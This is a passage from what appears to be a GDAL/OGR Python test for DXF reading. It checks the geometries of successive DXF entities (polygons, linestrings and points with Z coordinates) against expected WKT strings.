if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((-0.5 2.0 -0.866025403784439,-0.5 3.0 -0.866025403784439,-1.0 3.0 -1.73205080756888,-1.0 2.0 -1.73205080756888,-0.5 2.0 -0.866025403784439))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):29
# EntityHandle (String) = 1D9
# POLYGON Z ((-1.5 4.0 -2.59807621135332,-2.0 4.0 -3.46410161513776,-2.0 3.0 -3.46410161513776,-1.5 3.0 -2.59807621135332,-1.5 4.0 -2.59807621135332))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-1.5 4.0 -2.59807621135332,-2.0 4.0 -3.46410161513776,-2.0 3.0 -3.46410161513776,-1.5 3.0 -2.59807621135332,-1.5 4.0 -2.59807621135332))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):30
# EntityHandle (String) = 1DB
# POLYGON Z ((-4.0 8.0 -6.92820323027551,-4.5 8.0 -7.79422863405995,-4.5 9.0 -7.79422863405995,-4.0 9.0 -6.92820323027551,-4.0 8.0 -6.92820323027551))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((-4.0 8.0 -6.92820323027551,-4.5 8.0 -7.79422863405995,-4.5 9.0 -7.79422863405995,-4.0 9.0 -6.92820323027551,-4.0 8.0 -6.92820323027551))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):31
# EntityHandle (String) = 1DC
# LINESTRING (-1.0 2.0,-1.07692307692308 2.15384615384615,-1.15384615384615 2.30769230769231,-1.23076923076923 2.46153846153846,-1.30769230769231 2.61538461538461,-1.38461538461538 2.76923076923077,-1.46153846153846 2.92307692307692,-1.53846153846154 3.07692307692308,-1.61538461538461 3.23076923076923,-1.69230769230769 3.38461538461538,-1.76923076923077 3.53846153846154,-1.84615384615384 3.69230769230769,-1.92307692307692 3.84615384615385,-2.0 4.0,-2.07692307692307 4.15384615384615,-2.15384615384615 4.30769230769231,-2.23076923076923 4.46153846153846,-2.30769230769231 4.61538461538462,-2.38461538461538 4.76923076923077,-2.46153846153846 4.92307692307692,-2.53846153846154 5.07692307692308,-2.61538461538461 5.23076923076923,-2.69230769230769 5.38461538461538,-2.76923076923077 5.53846153846154,-2.84615384615384 5.69230769230769,-2.92307692307692 5.84615384615385,-3.0 6.0,-3.07692307692308 6.15384615384615,-3.15384615384615 6.30769230769231,-3.23076923076923 6.46153846153846,-3.30769230769231 6.61538461538462,-3.38461538461538 6.76923076923077,-3.46153846153846 6.92307692307692,-3.53846153846154 7.07692307692308,-3.61538461538461 7.23076923076923,-3.69230769230769 7.38461538461539,-3.76923076923077 7.53846153846154,-3.84615384615384 7.69230769230769,-3.92307692307692 7.84615384615385,-4.0 8.0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-1.0 2.0,-1.07692307692308 2.15384615384615,-1.15384615384615 2.30769230769231,-1.23076923076923 2.46153846153846,-1.30769230769231 2.61538461538461,-1.38461538461538 2.76923076923077,-1.46153846153846 2.92307692307692,-1.53846153846154 3.07692307692308,-1.61538461538461 3.23076923076923,-1.69230769230769 3.38461538461538,-1.76923076923077 3.53846153846154,-1.84615384615384 3.69230769230769,-1.92307692307692 3.84615384615385,-2.0 4.0,-2.07692307692307 4.15384615384615,-2.15384615384615 4.30769230769231,-2.23076923076923 4.46153846153846,-2.30769230769231 4.61538461538462,-2.38461538461538 4.76923076923077,-2.46153846153846 4.92307692307692,-2.53846153846154 5.07692307692308,-2.61538461538461 5.23076923076923,-2.69230769230769 5.38461538461538,-2.76923076923077 5.53846153846154,-2.84615384615384 5.69230769230769,-2.92307692307692 5.84615384615385,-3.0 6.0,-3.07692307692308 6.15384615384615,-3.15384615384615 6.30769230769231,-3.23076923076923 6.46153846153846,-3.30769230769231 6.61538461538462,-3.38461538461538 6.76923076923077,-3.46153846153846 6.92307692307692,-3.53846153846154 7.07692307692308,-3.61538461538461 7.23076923076923,-3.69230769230769 7.38461538461539,-3.76923076923077 7.53846153846154,-3.84615384615384 7.69230769230769,-3.92307692307692 7.84615384615385,-4.0 8.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):32
# EntityHandle (String) = 1DD
# LINESTRING (-4.0 1.0,-3.81418685412768 0.987348067229724,-3.62887944840607 0.975707614760869,-3.44458352298589 0.966090122894857,-3.26180481801783 0.959507071933107,-3.08104907365262 0.956969942177043,-2.90282203004096 0.959490213928084,-2.72762942733357 0.968079367487651,-2.55597700568115 0.983748883157167,-2.38837050523441 1.00751024123805,-2.22531566614407 1.04037492203173,-2.06731822856083 1.08335440583961,-1.91488393263541 1.13746017296313,-1.76851851851852 1.2037037037037,-1.62872772636086 1.28309647836275,-1.49601729631315 1.37664997724169,-1.3708929685261 1.48537568064195,-1.25386048315042 1.61028506886495,-1.14542558033682 1.75238962221211,-1.04609400023601 1.91270082098484,-0.956350410492422 2.09218800047202,-0.876194811106054 2.29085116067364,-0.805142534432475 2.50772096630085,-0.742687840320977 2.74178593705221,-0.688324988620847 2.99203459262631,-0.641548239181376 3.25745545272172,-0.601851851851852 3.53703703703703,-0.568730086481566 3.82976786527082,-0.541677202919806 4.13463645712166,-0.520187461015863 4.45063133228814,-0.503755120619026 4.77674101046882,-0.491874441578583 5.11195401136229,-0.484039683743826 5.45525885466714,-0.479745106964042 5.80564406008193,-0.478484971088521 6.16209814730525,-0.479753535966554 6.52360963603567,-0.483045061447428 6.88916704597178,-0.487853807380435 7.25775889681216,-0.493674033614862 7.62837370825537,-0.5 8.0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-4.0 1.0,-3.81418685412768 0.987348067229724,-3.62887944840607 0.975707614760869,-3.44458352298589 0.966090122894857,-3.26180481801783 0.959507071933107,-3.08104907365262 0.956969942177043,-2.90282203004096 0.959490213928084,-2.72762942733357 0.968079367487651,-2.55597700568115 0.983748883157167,-2.38837050523441 1.00751024123805,-2.22531566614407 1.04037492203173,-2.06731822856083 1.08335440583961,-1.91488393263541 1.13746017296313,-1.76851851851852 1.2037037037037,-1.62872772636086 1.28309647836275,-1.49601729631315 1.37664997724169,-1.3708929685261 1.48537568064195,-1.25386048315042 1.61028506886495,-1.14542558033682 1.75238962221211,-1.04609400023601 1.91270082098484,-0.956350410492422 2.09218800047202,-0.876194811106054 2.29085116067364,-0.805142534432475 2.50772096630085,-0.742687840320977 2.74178593705221,-0.688324988620847 2.99203459262631,-0.641548239181376 3.25745545272172,-0.601851851851852 3.53703703703703,-0.568730086481566 3.82976786527082,-0.541677202919806 4.13463645712166,-0.520187461015863 4.45063133228814,-0.503755120619026 4.77674101046882,-0.491874441578583 5.11195401136229,-0.484039683743826 5.45525885466714,-0.479745106964042 5.80564406008193,-0.478484971088521 6.16209814730525,-0.479753535966554 6.52360963603567,-0.483045061447428 6.88916704597178,-0.487853807380435 7.25775889681216,-0.493674033614862 7.62837370825537,-0.5 8.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):33
# EntityHandle (String) = 1DE
# POINT Z (-3.5 7.0 -6.06217782649107)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-3.5 7.0 -6.06217782649107)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):34
# EntityHandle (String) = 1DF
# POINT Z (1.0 -2.0 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (1.0 -2.0 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):35
# EntityHandle (String) = 1E0
# LINESTRING Z (0 0 0,0.25 -0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,0.25 -0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):36
# EntityHandle (String) = 1E1
# LINESTRING Z (0.25 -0.5 -1.29903810567666,-0.25 -0.5 -2.1650635094611,1.0 -1.0 -1.73205080756888,0.25 -0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0.25 -0.5 -1.29903810567666,-0.25 -0.5 -2.1650635094611,1.0 -1.0 -1.73205080756888,0.25 -0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):37
# EntityHandle (String) = 1E2
# LINESTRING Z (0.25 -0.5 -1.29903810567666,1 -1 -1.73205080756888,0.5 -1.0 -2.59807621135332,0.25 -0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0.25 -0.5 -1.29903810567666,1 -1 -1.73205080756888,0.5 -1.0 -2.59807621135332,0.25 -0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):38
# EntityHandle (String) = 1E7
# LINESTRING Z (2.78885438199983 -2.89442719099992 -5.19615242270663,2.76889880091653 -2.9234444547489 -5.33123525325721,2.74032532268425 -2.94796278993866 -5.46565997383582,2.70327315441675 -2.96786274570473 -5.59877168071614,2.65792281055334 -2.98304737146295 -5.72992186704258,2.60449523341074 -2.99344268924297 -5.85847158229053,2.54325071677425 -2.99899805410152 -5.98379454516908,2.47448763777266 -2.99968640085941 -6.1052801948005,2.39854100321483 -2.99550437596044 -6.22233666531148,2.31578081747018 -2.98647235380955 -6.33439366934417,2.22661027984464 -2.97263433751074 -6.44090527643885,2.13146382023413 -2.95405774448845 -6.54135257275227,2.03080498262578 -2.93083307803656 -6.63524618915372,1.92512416675824 -2.90307348639549 -6.72212868538223,1.81493623894341 -2.87091421150532 -6.80157677864958,1.70077802368955 -2.8345119301207 -6.87320340583148,1.58320568834623 -2.79404399049737 -6.93665960920016,1.46279203351292 -2.74970754836936 -6.99163623651142,1.34012370241203 -2.70171860642604 -7.03786544716322,1.21579832282211 -2.65031096196872 -7.07512201708822,1.09042159549536 -2.59573506787371 -7.10322443602275,0.964604343244512 -2.5382568124111 -7.12203579180661,0.838959535075416 -2.47815622386382 -7.13146443740534,0.714099299863701 -2.41572610625796 -7.13146443740534,0.590631944124412 -2.35127061285105 -7.12203579180661,0.469158988403815 -2.28510376432794 -7.10322443602275,0.350272236731764 -2.21754791892355 -7.07512201708822,0.234550893411949 -2.148932201926 -7.03786544716322,0.122558741196756 -2.07959090221128 -6.99163623651142,0.014841394594365 -2.00986184362144 -6.93665960920016,-0.088076358310285 -1.94008473912078 -6.87320340583148,-0.185693112570302 -1.87059953574847 -6.80157677864958,-0.277533289171331 -1.8017447584307 -6.72212868538223,-0.363149452004714 -1.73385586072131 -6.63524618915372,-0.442124487731234 -1.66726359050577 -6.54135257275227,-0.514073637915374 -1.60229237863074 -6.44090527643885,-0.57864637352974 -1.53925875830959 -6.33439366934417,-0.635528102697248 -1.47846982300441 -6.22233666531148,-0.684441703351125 -1.42022173029752 -6.1052801948005,-0.725148873345763 -1.36479825904151 -5.98379454516908,-0.757451291440819 -1.31246942681719 -5.85847158229053,-0.781191583502361 -1.2634901744351 -5.72992186704258,-0.796254089213832 -1.21809912388944 -5.59877168071614,-0.802565425561482 -1.1765174158158 -5.46565997383582,-0.80009484434904 -1.13894763211612 -5.33123525325721,-0.788854381999831 -1.10557280900008 -5.19615242270663,-0.768898800916532 -1.0765555452511 -5.06106959215606,-0.740325322684253 -1.05203721006134 -4.92664487157745,-0.703273154416746 -1.03213725429527 -4.79353316469713,
# -0.65792281055334 -1.01695262853705 -4.66238297837069,-0.604495233410736 -1.00655731075703 -4.53383326312274,-0.543250716774252 -1.00100194589848 -4.40851030024419,-0.474487637772662 -1.00031359914059 -4.28702465061277,-0.398541003214825 -1.00449562403956 -4.16996818010179,-0.315780817470174 -1.01352764619045 -4.0579111760691,-0.226610279844633 -1.02736566248926 -3.95139956897441,-0.131463820234124 -1.04594225551155 -3.85095227266099,-0.03080498262578 -1.06916692196344 -3.75705865625955,0.074875833241763 -1.09692651360451 -3.67017616003104,0.185063761056595 -1.12908578849468 -3.59072806676368,0.299221976310455 -1.1654880698793 -3.51910143958179,0.416794311653771 -1.20595600950263 -3.45564523621311,0.537207966487078 -1.25029245163064 -3.40066860890185,0.659876297587969 -1.29828139357396 -3.35443939825005,0.784201677177895 -1.34968903803128 -3.31718282832505,0.909578404504639 -1.40426493212629 -3.28908040939052,1.03539565675549 -1.4617431875889 -3.27026905360665,1.16104046492459 -1.52184377613619 -3.26084040800793,1.2859007001363 -1.58427389374204 -3.26084040800793,1.40936805587559 -1.64872938714895 -3.27026905360665,1.53084101159619 -1.71489623567206 -3.28908040939052,1.64972776326824 -1.78245208107646 -3.31718282832505,1.76544910658805 -1.851067798074 -3.35443939825005,1.87744125880325 -1.92040909778872 -3.40066860890185,1.98515860540564 -1.99013815637856 -3.45564523621311,2.08807635831029 -2.05991526087922 -3.51910143958179,2.1856931125703 -2.12940046425153 -3.59072806676368,2.27753328917133 -2.1982552415693 -3.67017616003104,2.36314945200472 -2.26614413927869 -3.75705865625955,2.44212448773124 -2.33273640949423 -3.85095227266099,2.51407363791538 -2.39770762136926 -3.95139956897441,2.57864637352974 -2.46074124169041 -4.0579111760691,2.63552810269725 -2.52153017699559 -4.16996818010179,2.68444170335113 -2.57977826970249 -4.28702465061277,2.72514887334576 -2.63520174095849 -4.40851030024419,2.75745129144082 -2.68753057318281 -4.53383326312274,2.78119158350236 -2.7365098255649 -4.66238297837069,2.79625408921383 -2.78190087611056 -4.79353316469713,2.80256542556148 -2.82348258418421 -4.92664487157744,2.80009484434904 -2.86105236788389 -5.06106959215606,2.78885438199983 -2.89442719099992 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.78885438199983 -2.89442719099992 -5.19615242270663,2.76889880091653 -2.9234444547489 -5.33123525325721,2.74032532268425 -2.94796278993866 -5.46565997383582,2.70327315441675 -2.96786274570473 -5.59877168071614,2.65792281055334 -2.98304737146295 -5.72992186704258,2.60449523341074 -2.99344268924297 -5.85847158229053,2.54325071677425 -2.99899805410152 -5.98379454516908,2.47448763777266 -2.99968640085941 -6.1052801948005,2.39854100321483 -2.99550437596044 -6.22233666531148,2.31578081747018 -2.98647235380955 -6.33439366934417,2.22661027984464 -2.97263433751074 -6.44090527643885,2.13146382023413 -2.95405774448845 -6.54135257275227,2.03080498262578 -2.93083307803656 -6.63524618915372,1.92512416675824 -2.90307348639549 -6.72212868538223,1.81493623894341 -2.87091421150532 -6.80157677864958,1.70077802368955 -2.8345119301207 -6.87320340583148,1.58320568834623 -2.79404399049737 -6.93665960920016,1.46279203351292 -2.74970754836936 -6.99163623651142,1.34012370241203 -2.70171860642604 -7.03786544716322,1.21579832282211 -2.65031096196872 -7.07512201708822,1.09042159549536 -2.59573506787371 -7.10322443602275,0.964604343244512 -2.5382568124111 -7.12203579180661,0.838959535075416 -2.47815622386382 -7.13146443740534,0.714099299863701 -2.41572610625796 -7.13146443740534,0.590631944124412 -2.35127061285105 -7.12203579180661,0.469158988403815 -2.28510376432794 -7.10322443602275,0.350272236731764 -2.21754791892355 -7.07512201708822,0.234550893411949 -2.148932201926 -7.03786544716322,0.122558741196756 -2.07959090221128 -6.99163623651142,0.014841394594365 -2.00986184362144 -6.93665960920016,-0.088076358310285 -1.94008473912078 -6.87320340583148,-0.185693112570302 -1.87059953574847 -6.80157677864958,-0.277533289171331 -1.8017447584307 -6.72212868538223,-0.363149452004714 -1.73385586072131 -6.63524618915372,-0.442124487731234 -1.66726359050577 -6.54135257275227,-0.514073637915374 -1.60229237863074 -6.44090527643885,-0.57864637352974 -1.53925875830959 -6.33439366934417,-0.635528102697248 -1.47846982300441 -6.22233666531148,-0.684441703351125 -1.42022173029752 -6.1052801948005,-0.725148873345763 -1.36479825904151 -5.98379454516908,-0.757451291440819 -1.31246942681719 -5.85847158229053,-0.781191583502361 -1.2634901744351 -5.72992186704258,-0.796254089213832 -1.21809912388944 -5.59877168071614,-0.802565425561482 -1.1765174158158 -5.46565997383582,-0.80009484434904 -1.13894763211612 -5.33123525325721,-0.788854381999831 -1.10557280900008 -5.19615242270663,-0.768898800916532 -1.0765555452511 -5.06106959215606,-0.740325322684253 -1.05203721006134 -4.92664487157745,-0.703273154416746 -1.03213725429527 -4.79353316469713,-0.65792281055334 -1.01695262853705 -4.66238297837069,-0.604495233410736 -1.00655731075703 -4.53383326312274,-0.543250716774252 -1.00100194589848 -4.40851030024419,-0.474487637772662 -1.00031359914059 -4.28702465061277,-0.398541003214825 -1.00449562403956 -4.16996818010179,-0.315780817470174 -1.01352764619045 -4.0579111760691,' +\
'-0.226610279844633 -1.02736566248926 -3.95139956897441,-0.131463820234124 -1.04594225551155 -3.85095227266099,-0.03080498262578 -1.06916692196344 -3.75705865625955,0.074875833241763 -1.09692651360451 -3.67017616003104,0.185063761056595 -1.12908578849468 -3.59072806676368,0.299221976310455 -1.1654880698793 -3.51910143958179,0.416794311653771 -1.20595600950263 -3.45564523621311,0.537207966487078 -1.25029245163064 -3.40066860890185,0.659876297587969 -1.29828139357396 -3.35443939825005,0.784201677177895 -1.34968903803128 -3.31718282832505,0.909578404504639 -1.40426493212629 -3.28908040939052,1.03539565675549 -1.4617431875889 -3.27026905360665,1.16104046492459 -1.52184377613619 -3.26084040800793,1.2859007001363 -1.58427389374204 -3.26084040800793,1.40936805587559 -1.64872938714895 -3.27026905360665,1.53084101159619 -1.71489623567206 -3.28908040939052,1.64972776326824 -1.78245208107646 -3.31718282832505,1.76544910658805 -1.851067798074 -3.35443939825005,1.87744125880325 -1.92040909778872 -3.40066860890185,1.98515860540564 -1.99013815637856 -3.45564523621311,2.08807635831029 -2.05991526087922 -3.51910143958179,2.1856931125703 -2.12940046425153 -3.59072806676368,2.27753328917133 -2.1982552415693 -3.67017616003104,2.36314945200472 -2.26614413927869 -3.75705865625955,2.44212448773124 -2.33273640949423 -3.85095227266099,2.51407363791538 -2.39770762136926 -3.95139956897441,2.57864637352974 -2.46074124169041 -4.0579111760691,2.63552810269725 -2.52153017699559 -4.16996818010179,2.68444170335113 -2.57977826970249 -4.28702465061277,2.72514887334576 -2.63520174095849 -4.40851030024419,2.75745129144082 -2.68753057318281 -4.53383326312274,2.78119158350236 -2.7365098255649 -4.66238297837069,2.79625408921383 -2.78190087611056 -4.79353316469713,2.80256542556148 -2.82348258418421 -4.92664487157744,2.80009484434904 -2.86105236788389 -5.06106959215606,2.78885438199983 -2.89442719099992 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):39
# EntityHandle (String) = 1E8
# LINESTRING Z (2.0 -2.0 -3.46410161513775,1.0 -2.0 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.0 -2.0 -3.46410161513775,1.0 -2.0 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):40
# EntityHandle (String) = 1E9
# LINESTRING Z (1.0 -2.0 -5.19615242270663,0.0 -2.0 -6.92820323027551)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1.0 -2.0 -5.19615242270663,0.0 -2.0 -6.92820323027551)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):41
# EntityHandle (String) = 1EA
# LINESTRING Z (0.25 -1.5 -4.76313972081441,1.0 -2.0 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0.25 -1.5 -4.76313972081441,1.0 -2.0 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):42
# EntityHandle (String) = 1EB
# LINESTRING Z (1.0 -2.0 -5.19615242270663,1.75 -2.5 -5.62916512459885)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1.0 -2.0 -5.19615242270663,1.75 -2.5 -5.62916512459885)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):43
# EntityHandle (String) = 1EC
# LINESTRING Z (2.0 -2.0 -3.46410161513775,2.04988140556792 -2.03487823687206 -3.49852624302284,2.09464789446162 -2.06958655048003 -3.54122153501056,2.13408136884713 -2.10395584540888 -3.59197948393006,2.16798971280107 -2.1378186779085 -3.65055280215638,2.19620772828016 -2.17101007166283 -3.7166561263709,2.21859793994945 -2.2033683215379 -3.78996740782271,2.23505126494835 -2.23473578139294 -3.87012948131781,2.24548754433133 -2.2649596321166 -3.956751805292,2.2498559335943 -2.29389262614624 -4.04941236449012,2.24813515038388 -2.32139380484327 -4.14765972598196,2.2403335781829 -2.3473291852295 -4.25101523849813,2.2264892254669 -2.3715724127387 -4.35897536437091,2.2066695405307 -2.39400537680336 -4.47101413271915,2.18097108288703 -2.41451878627752 -4.58658570192556,2.14951905283833 -2.43301270189222 -4.70512701892219,2.11246668151345 -2.44939702314958 -4.82606056232836,2.069994484341 -2.46359192728339 -4.94879715607678,2.02230938159631 -2.47552825814758 -5.07273883982016,1.96964369030667 -2.485147863138 -5.19728178213388,1.91225399242609 -2.4924038765061 -5.32181922232198,1.85041988479386 -2.49726094768414 -5.44574442649435,1.78444261696682 -2.49969541350955 -5.56845364351315,1.71464362356182 -2.49969541350955 -5.68934904640778,1.64136295825855 -2.49726094768414 -5.80784164492769,1.56495763709223 -2.4924038765061 -5.92335415504372,1.48579989910733 -2.485147863138 -6.03532381141787,1.40427539284642 -2.47552825814758 -6.14320510913943,1.32078129750918 -2.46359192728339 -6.24647246137009,1.2357243879353 -2.44939702314958 -6.34462275995019,1.14951905283833 -2.43301270189222 -6.43717782649107,1.06258527594554 -2.41451878627752 -6.52368674201215,0.975346589879385 -2.39400537680336 -6.60372804377285,0.888228012749189 -2.3715724127387 -6.67691177859673,0.801653977505599 -2.3473291852295 -6.74288140268412,0.716046264145928 -2.32139380484327 -6.80131551865772,0.631821944844409 -2.29389262614623 -6.85192944137827,0.549391352018479 -2.2649596321166 -6.89447658490197,0.469156079230493 -2.23473578139294 -6.92874966382241,0.391507024664251 -2.2033683215379 -6.9545817031442,0.316822486708345 -2.17101007166283 -6.97184685176839,0.245466320924432 -2.1378186779085 -6.98046099562637,0.177786167379516 -2.10395584540888 -6.98038216747516,0.114111756978481 -2.06958655048003 -6.97161075135758,0.054753305048271 -2.03487823687206 -6.95418948073126,0.0 -2.0 -6.92820323027551,-0.049881405567917 -1.96512176312794 -6.89377860239042,-0.094647894461618 -1.93041344951997 -6.8510833104027,-0.134081368847123 -1.89604415459112 -6.8003253614832,-0.167989712801067 -1.8621813220915 -6.74175204325688,-0.196207728280158 -1.82898992833716 -6.67564871904237,-0.218597939949449 -1.7966316784621 -6.60233743759055,-0.235051264948343 -1.76526421860705 -6.52217536409545,
#-0.245487544331328 -1.7350403678834 -6.43555304012126,-0.2498559335943 -1.70610737385376 -6.34289248092314,-0.248135150383881 -1.67860619515673 -6.2446451194313,-0.240333578182897 -1.6526708147705 -6.14128960691513,-0.226489225466902 -1.6284275872613 -6.03332948104236,-0.206669540530698 -1.60599462319664 -5.92129071269411,-0.180971082887026 -1.58548121372248 -5.8057191434877,-0.149519052838327 -1.56698729810778 -5.68717782649107,-0.112466681513451 -1.55060297685042 -5.5662442830849,-0.069994484341001 -1.5364080727166 -5.44350768933648,-0.022309381596311 -1.52447174185242 -5.3195660055931,0.030356309693336 -1.514852136862 -5.19502306327939,0.087746007573915 -1.50759612349389 -5.07048562309128,0.149580115206143 -1.50273905231586 -4.94656041891892,0.215557383033179 -1.50030458649045 -4.82385120190011,0.28535637643818 -1.50030458649045 -4.70295579900548,0.35863704174145 -1.50273905231586 -4.58446320048557,0.435042362907775 -1.50759612349389 -4.46895069036954,0.514200100892672 -1.514852136862 -4.35698103399539,0.595724607153583 -1.52447174185242 -4.24909973627383,0.679218702490823 -1.5364080727166 -4.14583238404317,0.764275612064703 -1.55060297685042 -4.04768208546307,0.850480947161672 -1.56698729810778 -3.95512701892219,0.937414724054466 -1.58548121372248 -3.86861810340111,1.02465341012062 -1.60599462319664 -3.78857680164041,1.11177198725081 -1.6284275872613 -3.71539306681653,1.1983460224944 -1.6526708147705 -3.64942344272914,1.28395373585407 -1.67860619515673 -3.59098932675554,1.36817805515559 -1.70610737385376 -3.54037540403499,1.45060864798152 -1.7350403678834 -3.49782826051129,1.53084392076951 -1.76526421860705 -3.46355518159085,1.60849297533575 -1.7966316784621 -3.43772314226906,1.68317751329166 -1.82898992833716 -3.42045799364487,1.75453367907557 -1.8621813220915 -3.41184384978689,1.82221383262049 -1.89604415459112 -3.4119226779381,1.88588824302152 -1.93041344951997 -3.42069409405568,1.94524669495173 -1.96512176312794 -3.438115364682,2.0 -2.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.0 -2.0 -3.46410161513775,2.04988140556792 -2.03487823687206 -3.49852624302284,2.09464789446162 -2.06958655048003 -3.54122153501056,2.13408136884713 -2.10395584540888 -3.59197948393006,2.16798971280107 -2.1378186779085 -3.65055280215638,2.19620772828016 -2.17101007166283 -3.7166561263709,2.21859793994945 -2.2033683215379 -3.78996740782271,2.23505126494835 -2.23473578139294 -3.87012948131781,2.24548754433133 -2.2649596321166 -3.956751805292,2.2498559335943 -2.29389262614624 -4.04941236449012,2.24813515038388 -2.32139380484327 -4.14765972598196,2.2403335781829 -2.3473291852295 -4.25101523849813,2.2264892254669 -2.3715724127387 -4.35897536437091,2.2066695405307 -2.39400537680336 -4.47101413271915,2.18097108288703 -2.41451878627752 -4.58658570192556,2.14951905283833 -2.43301270189222 -4.70512701892219,2.11246668151345 -2.44939702314958 -4.82606056232836,2.069994484341 -2.46359192728339 -4.94879715607678,2.02230938159631 -2.47552825814758 -5.07273883982016,1.96964369030667 -2.485147863138 -5.19728178213388,1.91225399242609 -2.4924038765061 -5.32181922232198,1.85041988479386 -2.49726094768414 -5.44574442649435,1.78444261696682 -2.49969541350955 -5.56845364351315,1.71464362356182 -2.49969541350955 -5.68934904640778,1.64136295825855 -2.49726094768414 -5.80784164492769,1.56495763709223 -2.4924038765061 -5.92335415504372,1.48579989910733 -2.485147863138 -6.03532381141787,1.40427539284642 -2.47552825814758 -6.14320510913943,1.32078129750918 -2.46359192728339 -6.24647246137009,1.2357243879353 -2.44939702314958 -6.34462275995019,1.14951905283833 -2.43301270189222 -6.43717782649107,1.06258527594554 -2.41451878627752 -6.52368674201215,0.975346589879385 -2.39400537680336 -6.60372804377285,0.888228012749189 -2.3715724127387 -6.67691177859673,0.801653977505599 -2.3473291852295 -6.74288140268412,0.716046264145928 -2.32139380484327 -6.80131551865772,0.631821944844409 -2.29389262614623 -6.85192944137827,0.549391352018479 -2.2649596321166 -6.89447658490197,0.469156079230493 -2.23473578139294 -6.92874966382241,0.391507024664251 -2.2033683215379 -6.9545817031442,0.316822486708345 -2.17101007166283 -6.97184685176839,0.245466320924432 -2.1378186779085 -6.98046099562637,0.177786167379516 -2.10395584540888 -6.98038216747516,0.114111756978481 -2.06958655048003 -6.97161075135758,0.054753305048271 -2.03487823687206 -6.95418948073126,0.0 -2.0 -6.92820323027551,-0.049881405567917 -1.96512176312794 -6.89377860239042,-0.094647894461618 -1.93041344951997 -6.8510833104027,-0.134081368847123 -1.89604415459112 -6.8003253614832,-0.167989712801067 -1.8621813220915 -6.74175204325688,-0.196207728280158 -1.82898992833716 -6.67564871904237,-0.218597939949449 -1.7966316784621 -6.60233743759055,' + \
'-0.235051264948343 -1.76526421860705 -6.52217536409545,-0.245487544331328 -1.7350403678834 -6.43555304012126,-0.2498559335943 -1.70610737385376 -6.34289248092314,-0.248135150383881 -1.67860619515673 -6.2446451194313,-0.240333578182897 -1.6526708147705 -6.14128960691513,-0.226489225466902 -1.6284275872613 -6.03332948104236,-0.206669540530698 -1.60599462319664 -5.92129071269411,-0.180971082887026 -1.58548121372248 -5.8057191434877,-0.149519052838327 -1.56698729810778 -5.68717782649107,-0.112466681513451 -1.55060297685042 -5.5662442830849,-0.069994484341001 -1.5364080727166 -5.44350768933648,-0.022309381596311 -1.52447174185242 -5.3195660055931,0.030356309693336 -1.514852136862 -5.19502306327939,0.087746007573915 -1.50759612349389 -5.07048562309128,0.149580115206143 -1.50273905231586 -4.94656041891892,0.215557383033179 -1.50030458649045 -4.82385120190011,0.28535637643818 -1.50030458649045 -4.70295579900548,0.35863704174145 -1.50273905231586 -4.58446320048557,0.435042362907775 -1.50759612349389 -4.46895069036954,0.514200100892672 -1.514852136862 -4.35698103399539,0.595724607153583 -1.52447174185242 -4.24909973627383,0.679218702490823 -1.5364080727166 -4.14583238404317,0.764275612064703 -1.55060297685042 -4.04768208546307,0.850480947161672 -1.56698729810778 -3.95512701892219,0.937414724054466 -1.58548121372248 -3.86861810340111,1.02465341012062 -1.60599462319664 -3.78857680164041,1.11177198725081 -1.6284275872613 -3.71539306681653,1.1983460224944 -1.6526708147705 -3.64942344272914,1.28395373585407 -1.67860619515673 -3.59098932675554,1.36817805515559 -1.70610737385376 -3.54037540403499,1.45060864798152 -1.7350403678834 -3.49782826051129,1.53084392076951 -1.76526421860705 -3.46355518159085,1.60849297533575 -1.7966316784621 -3.43772314226906,1.68317751329166 -1.82898992833716 -3.42045799364487,1.75453367907557 -1.8621813220915 -3.41184384978689,1.82221383262049 -1.89604415459112 -3.4119226779381,1.88588824302152 -1.93041344951997 -3.42069409405568,1.94524669495173 -1.96512176312794 -3.438115364682,2.0 -2.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):44
# EntityHandle (String) = 1ED
